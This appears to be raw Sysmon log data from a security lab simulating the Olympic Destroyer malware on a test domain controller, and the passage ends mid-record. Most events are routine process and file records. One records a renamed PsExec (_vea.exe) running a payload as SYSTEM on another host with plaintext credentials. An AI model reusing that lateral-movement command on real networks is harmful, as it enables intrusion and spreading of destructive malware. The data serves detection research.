10:57:22.206{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1312-6216-3F06-000000003802}6404C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292902Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:22.075{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1312-6216-3E06-000000003802}516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292901Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:22.075{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292900Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:22.075{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292899Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:22.075{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292898Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:22.075{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292897Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:22.059{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-1312-6216-3E06-000000003802}516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292896Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:22.069{C8EA50B7-1312-6216-3E06-000000003802}516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.12 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292895Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:22.059{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1312-6216-3E06-000000003802}516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292894Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:22.059{C8EA50B7-130F-6216-3106-000000003802}6920C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000292893Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:22.028{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDD5766228EAA01F8FAB73C5169BA0E0,SHA256=E6C4986DAF2FD6EE5BAF89AE29C499487076EFCAD0631A4F66E62869BD3F3F50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217804Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:23.462{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=173801D667C67005CB12D483357AE27E,SHA256=52C067E187487425D6FEDA9FB9C8D6B422EEECBCE9846BCABCDD6C690FF67726,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292919Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:23.529{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A227D87F86735A402B17D66B86B489BB,SHA256=66DBE0B51A2DD5DC1ACBFCCBC70C6CEAA359875590000FD94A8CCE162238DE14,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292918Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:23.476{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292917Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:23.476{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292916Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:23.444{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292915Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:23.444{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292914Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:23.444{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292913Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:23.444{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292912Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:23.061{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=574116F2FF96FA3DC88A27707E3134EE,SHA256=BC5624543EF6588C08BF7B991DC931BC24E363CF7EBD229D9F1EB5A9976CDFD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217806Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:24.462{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E03126E92D879CCC4C42397C06DE50EF,SHA256=A270EE05EE0B8B8F140A799E20CFBA55615A7CE1FF26E5946F6575823C4DB067,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292922Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:24.960{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\aborted-session-pingMD5=EBCBC5DE1B3B05905DB5EECE2FCAC1B6,SHA256=945333394E785D560E4C888ADA21FC862B1B9551F01BA452470FDF167174CE20,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292921Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:24.391{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292920Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:24.076{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE8782AF29B0CA27D27EFB1E3714AF55,SHA256=5E7975F944CC6E440ECD87B5BDF1B871ADEC6D50A080ADD6470811FC587ADAA1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217805Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:21.518{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51418-false10.0.1.12-8000- 23542300x8000000000000000217807Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:25.463{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E2D76D932A35E6B683EBAD4FE820632,SHA256=523A08769D8AD8E4406188CE222CED06B58E6D744387CB35AD78D3E0EED19EC9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292993Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.725{C8EA50B7-1315-6216-4706-000000003802}3446616C:\Windows\system32\conhost.exe{C8EA50B7-1315-6216-4406-000000003802}6520C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292992Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.724{C8EA50B7-1315-6216-4806-000000003802}45687164C:\Windows\system32\conhost.exe{C8EA50B7-1315-6216-4506-000000003802}3972C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292991Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.628{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1315-6216-4806-000000003802}4568C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292990Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.609{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1315-6216-4706-000000003802}344C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292989Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.591{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1315-6216-4806-000000003802}4568C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292988Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.575{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1315-6216-4706-000000003802}344C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292987Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.560{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292986Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:25.560{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1315-6216-4606-000000003802}6652C:\Program 